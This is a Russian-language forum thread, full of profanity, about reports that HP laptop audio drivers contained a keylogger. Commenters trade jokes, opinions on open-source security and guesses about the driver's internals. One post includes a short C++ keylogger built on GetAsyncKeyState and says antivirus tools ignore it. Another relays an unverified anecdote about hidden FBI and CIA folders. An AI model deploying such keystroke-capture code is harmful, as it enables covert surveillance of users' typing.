Тотальная слежка: Драйвера для звуковых карт в ноутбуках НР вот уже два года поставляются со встроенным кейлоггером

Боже да всем насрать! Я уже давно понял, что в нынешнем мире, чем меньше хранишь на компе тем лучше. Максимум на ЯПе темы позырить и список продуктов для магаза! :)

Если камеру не заклеил, то ещё и видели.

Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?

А я доволен HP, и такой хуйни файлов не нашёл Да и похуй-Винда похлеще сексотит, и ничего, всем похуй

Ага!
Эти злодеи вообще к любой технике тяготеют!
И на iOs'e, и на Винде, и на Андроиде...
Полигамные техникофилы, а не воины Аллаха!

Это сообщение отредактировал brync - 16.05.2017 - 17:26

не успевает, панимаш, пока кнопа нажалась, надо сделать соответствующее событие. В этот момент снова кнопа нажалась, пока делалось событие, прога пропустила нажатие следующей кнопы и программа облажалась, чё не понятно? Надо записывать, потом неспешно все события выпонять, мало ли...

Еще не набежали "кому-мы-нужны-это-все-шизофрения"? )))))
Странно))))) Я думал, что они всегда, даже не по теме доказывают, что все сделанное - для удобства пользователя. Хотя, в целом они правы, вопрос только для какого пользователя)))))

Ты че сказал, нехристь?! С Амиго такого быть не может!!!

Ага. А ты попробуй этот код вернуть)) Я же спецом написал - стейбл. Это даже не анстейбл будет, а экспериментал. Проверяют и постят все ментейнеры. Они же повышают ранг дистрибутива после тестов. Там все не так просто. "Изменить" не прокатит. А код видят тысячи пользователей, которые знают как его читать - поэтому да, отчасти стабильный открытый код - наилучшая гарантия.

Дааа? Вот сейчас по всему миру заплакали жертвы всех Рансомов вообще и ВоннаКрай персольнально. Они все используют штатное шифрование винды и хер ты это PGP откроешь. точнее, если откроешь, то Нобелевская Премия Мира гарантирована (за вклад в математику нету).

ЗЫ Точнее теория не запрещает, но таких вычислительных мощностей нет в сумме. Хоть всеми компами и смартами считай. А если вдруг появятся, то увеличат длинну ключа и опять писец-невскрываемо. Только брутфорс. Алгоритма нет чисто из теории.

ЗЗЫ 4линуксоиды. PGP придумывалось под UNIX- у вас точно такой же модуль шифрования, только права получить сложнее (и то уже не факт). В винде воще дофига всего сперто из униха. Начинаешь отслеживать зависимости: класс-обертка, в нем еще обертка, в нем еще 5... "бля, я это уже видел!"- стандартный никсовый tcpip.h (даже коменты теже стоят, сравнивал с тем же хидером в QNX)...

Это сообщение отредактировал lumy - 16.05.2017 - 18:55

охоспади! вы ещё про пунтосвичер расскажите, новость, тоже блин...
по факту - мы все умрём, ну а пока я схожу посру

Тут не все, да?) Все доступно и понятно.

Получение ключей из реестра. Как только девайс начинает юзаться открываем его, отключаем события, включаем режим оповещения дополнительного устройства (программы), дальше должно быть что-то вроде RegisterLoadEvent и дальнейшая работа)

Все это - названия вызываемых функций.

Ну и настройка регистров ниже)

scancode 0x2a - то, чтотдравер клавы выдает.

extra 0x0 - скорее всего сочтояния модификаторов (шифт-контрол итд)

vk 0x52 - код клавиши

flags 0x80 - нажатие
flags 0x80 - отпускание

Кусок из Winapi.Windows;

Это сообщение отредактировал BoaSoft - 16.05.2017 - 19:16

Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed

Они, блядь, ознакомились с проблемой! Хуйли с ней знакомиться - она у вас (я про компанию) в технической документации подробно описана. Но особо эпично то, что эти ахуевшие нашли решение! Они нашли его, Ганс! (карл заебал уже). Небось месяц думали - как бы, блядь, решить эту нетривиальную проблему. Да просто - выпилить нахуй этот функционал и все.

Нихуя не удивлюсь, если выпиливание функционала сводится к закомментированию одной строчки кода:

// auto keyLogger = new KeyLogger();

Вот же гандоны какие, а...

Первым делом довольный покупатель ноутбука что делает? Заклеивает веб-камеру!

LINUX X U B U N T U у меня, прочитал слово в виндовс и успокоился )

Это сообщение отредактировал Spawn2010 - 16.05.2017 - 19:42

Хорошо что мой HP сдох нахуй

Не без этого)) Бывают и такие косяки)

Amok555
Так что тысячи глаз и стейбл - не гарантия.

lumy
Речь выше шла о самописных алгоритмах, а не технологическом стандарте. С технологическим стандартом тоже все непросто - криптография наука сложная, алгоритм проверить на коллизии непросто

Пфф, тоже мне открытие. Один фиг там каша из данных и выудить оттуда какую-то конкретную инфу тот еще гемор. Так что какой-либо взлом через это возможен только конкретно нацеленный, а если есть возможноть слямзить этот лог, то думаю можно найти возможность впаять нормальный кейлогер в систему.

Ну и так, для общего ознакомления - элементарнейший кейлогер на плюсах (тоже антивирям пофиг на такое поведение):

#include <iostream>
#include <Windows.h>

int main()
{
        bool keys[256] = { false };
        while (true)
        {
                int key_code = 0;
                for (bool& key : keys) key = GetAsyncKeyState(key_code++);
                for (char c = ' '; c <= 'z'; ++c) if (keys[c]) std::cout << c;
        }
}

когда-то давно, лет 10 назад поставил нам в контору HP партию десктопов, с предустановленной виндой. поскольку у нас винда корпоративная, предустановленную сносили и ставили свою. а я чего-то решил перед сносом заглянуть че там на винте, так вот при загрузке с CD появились папочки C:\FBI и C:\CIA которые в установленной родной винде никак не были видны :)
внутри программки... к сожалению не сохранил :(

Я видел кино, которое также начиналось

А чо будет? Кейлогер направит америкосам , ну или в HP или куда нить еще что вы ищете в поисковиках? Или пишете что кому?

HP elitedesk 800 + Дровлённый моник иховый E221c при коннекте ч-з цифру (или VGA+USB)

Вполне себе слушать и видеть юзеров позволяет, кста.. это фирменная ФИЧА!